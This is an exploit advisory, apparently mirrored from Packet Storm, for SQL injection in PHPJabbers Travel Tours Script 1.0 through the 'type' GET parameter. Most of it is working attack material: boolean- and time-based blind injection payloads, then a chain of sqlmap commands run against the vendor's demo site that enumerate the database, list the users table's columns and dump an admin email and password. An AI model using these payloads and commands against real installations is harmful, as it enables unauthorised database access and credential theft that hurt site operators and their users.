Exploit for Travel Tours Script 1.0 SQL Injection

Name: Exploit for Travel Tours Script 1.0 SQL Injection
Rating: 5 (169 reviews)
2022-07-18 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:167756
┌┌────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Exploits ] ┌┘  
└────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr │ │ :  
│ Website : phpjabbers.com │ │ │  
│ Vendor : PHPJABBERS │ │ Travel Tours Script │  
│ Software : Travel Tours Script V1.0 │ │ │  
│ Vuln Type: Remote SQL Injection │ │ A content management solution for │  
│ Method : GET │ │ travel agencies and tour operators │  
│ Critical : High [░░▒▒▓▓██] │ │ │  
│ Impact : Database Access │ │ │  
│ ─────────────────────────────────────┘ └────────────────────────────────────│  
│ B4nks-NET irc.b4nks.tk #unix ┌┘  
└────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ Typically used for remotely exploitable vulnerabilities that can lead to │  
│ system compromise. │  
│ │  
┌┌────────────────────────────────────────────────────────────────────────────┐  
┌┘ Exploit URL's ┌┘  
└────────────────────────────────────────────────────────────────────────────┘┘  
  
Live Demo Site:  
  
https://www.phpjabbers.com/travel-tours-script/#sectionDemo  
  
POC:  
  
https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection]  
GET parameter 'type' is vulnerable  
  
---  
Parameter: type (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206  
---  
  
[+] Starting the Attack  
  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast  
  
the back-end DBMS is MySQL  
web server operating system: Linux CentOS 6  
web application technology: Apache 2.2.15  
back-end DBMS: MySQL >= 5.0.12  
[INFO] fetching current database  
current database: 'pjabbers_demo_vpl'  
  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast  
  
  
[INFO] fetching tables for database: 'pjabbers_demo_vpl'  
[INFO] fetching number of tables for database 'pjabbers_demo_vpl'  
[INFO] resumed: 52  
  
+------------------------------------------+  
| vacationpackages_comments |  
| vacationpackages_countries |  
| vacationpackages_enquiries |  
| vacationpackages_features |  
| vacationpackages_fields |  
| vacationpackages_listings_availabilities |  
| vacationpackages_listings_features |  
| vacationpackages_listings |  
| vacationpackages_multi_lang |  
| vacationpackages_notifications |  
| vacationpackages_options |  
| vacationpackages_payments |  
| vacationpackages_periods |  
| vacationpackages_plugin_country |  
| vacationpackages_plugin_galleries_set |  
| vacationpackages_plugin_gallery |  
| vacationpackages_plugin_locale_languages |  
| vacationpackages_plugin_locale |  
| vacationpackages_plugin_log_config |  
| vacationpackages_plugin_log |  
| vacationpackages_plugin_one_admin |  
| vacationpackages_plugin_paypal |  
| vacationpackages_prices |  
| vacationpackages_roles |  
| vacationpackages_types |  
| vacationpackages_users |  
| vacationpackages_comments |  
| vacationpackages_countries |  
| vacationpackages_enquiries |  
| vacationpackages_features |  
| vacationpackages_fields |  
| vacationpackages_listings |  
| vacationpackages_listings_availabilities |  
| vacationpackages_listings_features |  
| vacationpackages_multi_lang |  
| vacationpackages_notifications |  
| vacationpackages_options |  
| vacationpackages_payments |  
| vacationpackages_periods |  
| vacationpackages_plugin_country |  
| vacationpackages_plugin_galleries_set |  
| vacationpackages_plugin_gallery |  
| vacationpackages_plugin_locale |  
| vacationpackages_plugin_locale_languages |  
| vacationpackages_plugin_log |  
| vacationpackages_plugin_log_config |  
| vacationpackages_plugin_one_admin |  
| vacationpackages_plugin_paypal |  
| vacationpackages_prices |  
| vacationpackages_roles |  
| vacationpackages_types |  
| vacationpackages_users |  
+------------------------------------------+  
  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast  
  
[INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'  
Database: pjabbers_demo_vpl  
Table: vacationpackages_users  
[16 columns]  
  
+----------------+--------------------------------------------------------+  
| Column | Type |  
+----------------+--------------------------------------------------------+  
| contact_fax | varchar(255) |  
| contact_mobile | varchar(255) |  
| contact_phone | varchar(255) |  
| contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') |  
| contact_url | varchar(255) |  
| created | datetime |  
| email | varchar(255) |  
| id | int(10) unsigned |  
| ip | varchar(15) |  
| is_active | enum('T','F') |  
| last_login | datetime |  
| name | varchar(255) |  
| password | blob |  
| phone | varchar(255) |  
| role_id | int(10) unsigned |  
| status | enum('T','F') |  
+----------------+--------------------------------------------------------+  
  
  
sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast  
  
[INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'  
Database: pjabbers_demo_vpl  
Table: vacationpackages_users  
[1 entry]  
  
+-----------------+------------------------+  
| email | password |  
+-----------------+------------------------+  
|admin@admin.com | P@S13rd |  
+-----------------+------------------------+  
  
[-] Done  
  
  
└─────────────────────────────────────────────────────────────────────────────┘  
  
Greets:  
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL  
CryptoJob (Twitter) twitter.com/CryptozJob  
┌┌────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2022 ┌┘  
└────────────────────────────────────────────────────────────────────────────┘┘